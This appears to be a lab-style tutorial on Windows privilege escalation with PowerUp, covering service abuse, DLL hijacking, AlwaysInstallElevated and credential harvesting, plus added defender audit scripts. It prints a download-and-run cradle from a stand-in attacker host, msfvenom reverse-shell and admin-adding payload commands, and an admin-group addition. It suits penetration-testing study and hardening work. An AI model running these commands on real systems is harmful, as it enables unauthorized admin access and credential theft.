PowerUp for Privilege Escalation

intermediate | 30 min | Writeup

Using PowerUp to find and exploit vulnerabilities

Learning Objectives

  • Run PowerUp checks
  • Understand vulnerability types
  • Exploit with PowerUp
  • Manual verification

PowerUp is a PowerShell-based privilege escalation tool from the PowerSploit framework. Unlike tools that only enumerate, PowerUp can both find AND exploit vulnerabilities automatically. It's like having a pentest robot.

PowerUp focuses on the most common and reliable Windows privilege escalation vectors: service misconfigurations, DLL hijacking, AlwaysInstallElevated, and more. It's your go-to tool when you need quick results.

PowerShell Required

PowerUp requires PowerShell. If PowerShell is restricted, you may need to bypass execution policies or use other tools instead.

Getting PowerUp

powershell
# PowerUp is part of PowerSploit
# https://github.com/PowerShellMafia/PowerSploit

# Download and import
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerUp.ps1')

# Or if you have the file locally
Import-Module .\PowerUp.ps1
. .\PowerUp.ps1

# Bypass execution policy if needed
powershell -ep bypass
Set-ExecutionPolicy Bypass -Scope Process

# If AMSI is blocking, need AMSI bypass first
# (Various techniques, out of scope here)

Invoke-AllChecks

The main command that runs all enumeration checks at once. This is your first stop when using PowerUp.

powershell
# Run all checks
Invoke-AllChecks

# Example output:
# [*] Running Invoke-AllChecks
#
# [*] Checking for modifiable service binaries...
#
# ServiceName    : vulnerable_service
# Path           : C:\Program Files\Vulnerable\service.exe
# ModifiablePath : C:\Program Files\Vulnerable\service.exe
# StartName      : LocalSystem
# AbuseFunction  : Install-ServiceBinary -Name 'vulnerable_service'
#
# [*] Checking for unquoted service paths...
#
# ServiceName    : another_service
# Path           : C:\Program Files\My App\service.exe
# StartName      : LocalSystem
# AbuseFunction  : Write-ServiceBinary -Name 'another_service' -Path ...
#
# [*] Checking for AlwaysInstallElevated...
#
# AbuseFunction  : Write-UserAddMSI

# Output to file
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

AbuseFunction

PowerUp tells you exactly how to exploit each finding with an "AbuseFunction". Run that function to automatically exploit the vulnerability!

Service-Related Checks

powershell
# === Service Binary Permissions ===
# Find services where we can modify the binary
Get-ModifiableServiceFile

# Exploit: Replace service binary
Install-ServiceBinary -Name 'vulnerable_service'
# Creates service.exe.bak, replaces with user-adding binary
# Restart service to trigger

# === Service Configuration ===
# Find services we can reconfigure
Get-ModifiableService

# Exploit: Change binary path to our payload
Invoke-ServiceAbuse -Name 'vulnerable_service'
# Adds current user to local Administrators
# Or custom command:
Invoke-ServiceAbuse -Name 'vulnerable_service' -Command "net localgroup Administrators attacker /add"

# === Unquoted Service Paths ===
Get-UnquotedService

# Exploit: Write malicious binary to unquoted path
Write-ServiceBinary -Name 'service_name' -Path 'C:\Program.exe'
# Or manual placement, then restart service

# === Service Permissions Check ===
# Uses accesschk internally
Get-ServiceUnquoted
Get-ModifiableServiceFile

Service Exploitation Flow

powershell
# Example: Found modifiable service binary

# 1. PowerUp reports:
# ServiceName   : VulnService
# Path          : C:\Services\vuln.exe
# AbuseFunction : Install-ServiceBinary -Name 'VulnService'

# 2. Run the abuse function
Install-ServiceBinary -Name 'VulnService'
# Backs up original, replaces with payload that adds user

# 3. Restart service (need restart permission)
Restart-Service VulnService
# Or wait for system restart

# 4. After service runs, new admin user exists
net localgroup Administrators
# Should show 'john' added by PowerUp

# 5. Log in as new admin or use credentials

# Custom payload option:
Install-ServiceBinary -Name 'VulnService' -Command 'C:\temp\shell.exe'
Restart-Service VulnService

DLL Hijacking Checks

powershell
# Find DLL hijacking opportunities
Find-ProcessDLLHijack
Find-PathDLLHijack

# Check for missing DLLs in PATH locations
# PowerUp checks for:
# - Missing DLLs that services try to load
# - Writable directories in PATH before system dirs
# - Known DLL hijacking opportunities

# Exploitation requires:
# 1. Writing malicious DLL to found location
# 2. Restarting the vulnerable service/process

# Create malicious DLL (on attack machine)
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll > evil.dll
# Transfer to target in hijackable location

# Example PATH hijack
# If C:\Temp is in PATH before C:\Windows\System32
# And a program looks for "missing.dll"
Copy-Item evil.dll C:\Temp\missing.dll
# Wait for or trigger the program
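The following is an added defender-side audit, not PowerUp code and not part of the original writeup. It checks, from the hardening side, the same two filesystem conditions that Get-UnquotedService (Service-Related Checks above) and Find-PathDLLHijack (this section) report: an unquoted, space-containing service ImagePath whose intermediate directory standard users can create files in, and machine PATH entries standard users can write to. It prints the quoted ImagePath a fix would set. It assumes English principal names (BUILTIN\Users and friends) and Windows PowerShell 5.1 or later.

```powershell
# Added audit script, not PowerUp code: reports the two filesystem conditions
# that Get-UnquotedService and Find-PathDLLHijack look for, from the defender's side.
function Test-StandardUserWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    # Groups every interactive account belongs to (English principal names assumed)
    $broad = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow' -or $broad -notcontains $ace.IdentityReference.Value) { continue }
        # Inherit-only ACEs apply to children, not to this directory itself
        if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
        $rights = [int]$ace.FileSystemRights
        # Bit 0x2 is CreateFiles/WriteData; GENERIC_WRITE and GENERIC_ALL imply it too
        if (($rights -band 0x2) -or ($rights -band 0x40000000) -or ($rights -band 0x10000000)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePathFinding {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $image = $svc.PathName
        # Quoted paths, non-.exe images and paths without spaces are not affected
        if (-not $image -or $image.StartsWith('"') -or $image -notmatch '^(?<exe>.*?\.exe)') { continue }
        $exe = $Matches.exe
        if ($exe -notmatch ' ') { continue }
        # Each space yields a shorter path Windows tries first (C:\Program.exe, C:\Program Files\My.exe);
        # the directory holding that candidate is what must not be writable by standard users
        $parts = $exe.Split(' '); $prefix = $parts[0]
        for ($i = 1; $i -lt $parts.Length; $i++) {
            $dir = Split-Path -Parent $prefix
            if (Test-StandardUserWritable -Path $dir) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; WritableDir = $dir
                                   FixedPath = '"' + $exe + '"' + $image.Substring($exe.Length) }
            }
            $prefix = "$prefix $($parts[$i])"
        }
    }
}

function Get-WritablePathDirectory {
    # Writable entries in the machine PATH are the Find-PathDLLHijack condition
    foreach ($dir in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';')) {
        if ($dir -and (Test-StandardUserWritable -Path $dir.Trim())) { [pscustomobject]@{ Directory = $dir } }
    }
}

Get-UnquotedServicePathFinding | Format-Table -AutoSize
Get-WritablePathDirectory | Format-Table -AutoSize
```

FixedPath is the value to put back into the service's ImagePath (via sc.exe config or the service's registry key); for a flagged PATH entry, tighten the directory ACL or remove the entry from the machine PATH.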

Registry Checks

powershell
# === AlwaysInstallElevated ===
Get-RegistryAlwaysInstallElevated

# If enabled (both HKLM and HKCU):
Write-UserAddMSI
# Creates UserAdd.msi that adds admin user when installed

# Manual: Create MSI with msfvenom
# msfvenom -p windows/adduser USER=pwned PASS=Password123! -f msi > evil.msi
# Or reverse shell MSI

# Install (as normal user, runs as SYSTEM!)
msiexec /quiet /qn /i evil.msi

# === AutoRun Programs ===
Get-ModifiableRegistryAutoRun

# Find AutoRun programs with weak permissions
# Replace with malicious binary, runs on next login

# === Scheduled Tasks ===
Get-ModifiableScheduledTaskFile

# Find scheduled tasks pointing to modifiable files
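An added audit and remediation snippet for the AlwaysInstallElevated finding, written here and not taken from PowerUp: it reads the policy DWORD in both hives, reports the system as exposed only when both are 1 (the condition the section above describes), and offers a function that sets both back to 0. Function names are this example's own; the registry path is the standard Windows Installer policy key.

```powershell
# Added audit/remediation script, not PowerUp code. AlwaysInstallElevated only
# lets a standard user install an MSI as SYSTEM when the DWORD is 1 in BOTH
# hives, which is the condition Get-RegistryAlwaysInstallElevated reports.
$InstallerPolicyKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AlwaysInstallElevatedState {
    $enabled = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\$InstallerPolicyKey"
        $value = $null
        if (Test-Path -LiteralPath $path) {
            # A missing value reads as $null, which is the secure default
            $value = (Get-ItemProperty -LiteralPath $path).AlwaysInstallElevated
        }
        $enabled[$hive] = ($value -eq 1)
    }
    [pscustomobject]@{
        HKLM       = $enabled['HKLM']
        HKCU       = $enabled['HKCU']   # per-user: audit the accounts that matter, or the GPO that sets it
        Vulnerable = ($enabled['HKLM'] -and $enabled['HKCU'])
    }
}

function Disable-AlwaysInstallElevated {
    # Writing the HKLM half needs local admin; an explicit 0 keeps the policy state visible
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\$InstallerPolicyKey"
        if (-not (Test-Path -LiteralPath $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -LiteralPath $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

Get-AlwaysInstallElevatedState
# Remediate with: Disable-AlwaysInstallElevated
```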

Credential Checks

powershell
# === Unattend Files ===
Get-UnattendedInstallFile

# Searches for:
# - Unattend.xml
# - sysprep.xml
# - sysprep.inf
# Returns paths and sometimes passwords!

# === Group Policy Preferences ===
Get-GPPPassword

# Finds cpassword in:
# - Groups.xml
# - ScheduledTasks.xml
# - Services.xml
# Decrypts automatically!

# === Web Config Files ===
Get-WebConfig

# Searches IIS config for connection strings
# May contain database passwords

# === Application Config ===
Get-ApplicationHost

# IIS application pool passwords

GPP Passwords

Group Policy Preference passwords are encrypted with a known key (published by Microsoft!). PowerUp decrypts them automatically. These often contain domain admin credentials.

PowerUp Function Reference

PowerUp Functions:
├── Enumeration
│   ├── Invoke-AllChecks - Run all checks
│   ├── Get-ModifiableService - Modifiable service configs
│   ├── Get-ModifiableServiceFile - Modifiable service binaries
│   ├── Get-UnquotedService - Unquoted service paths
│   ├── Get-ServiceDetail - Service details
│   ├── Find-ProcessDLLHijack - Process DLL hijacking
│   ├── Find-PathDLLHijack - PATH DLL hijacking
│   ├── Get-RegistryAlwaysInstallElevated
│   ├── Get-RegistryAutoLogon
│   ├── Get-ModifiableRegistryAutoRun
│   ├── Get-ModifiableScheduledTaskFile
│   ├── Get-UnattendedInstallFile
│   ├── Get-GPPPassword
│   ├── Get-WebConfig
│   └── Get-ApplicationHost
│
├── Exploitation
│   ├── Install-ServiceBinary - Replace service binary
│   ├── Invoke-ServiceAbuse - Abuse service permissions
│   ├── Write-ServiceBinary - Write to unquoted path
│   ├── Write-HijackDll - Write DLL for hijacking
│   └── Write-UserAddMSI - Create admin-adding MSI
│
└── Helpers
    ├── Get-ServicePermission
    ├── Test-ServiceDaclPermission
    └── Restore-ServiceBinary - Restore original binary

PowerUp Methodology

PowerUp Workflow

1. Import: Import-Module .\PowerUp.ps1 or IEX download
2. All Checks: Invoke-AllChecks to enumerate
3. Review: Check output for AbuseFunction hints
4. Choose: Select easiest/most reliable exploit
5. Exploit: Run the AbuseFunction or manual exploit
6. Verify: Confirm privilege escalation succeeded

Knowledge Check


What does PowerUp's Invoke-AllChecks do?

Challenges

PowerUp Exploitation (challenge, intermediate)

Use PowerUp to find a privilege escalation vulnerability and exploit it using the suggested AbuseFunction.


Key Takeaways

  • PowerUp both finds and exploits privilege escalation vectors
  • Invoke-AllChecks runs all enumeration at once
  • AbuseFunction tells you exactly how to exploit each finding
  • Focus on: services, AlwaysInstallElevated, credentials
  • Can automatically add admin user or run custom commands
  • Combine with WinPEAS for comprehensive coverage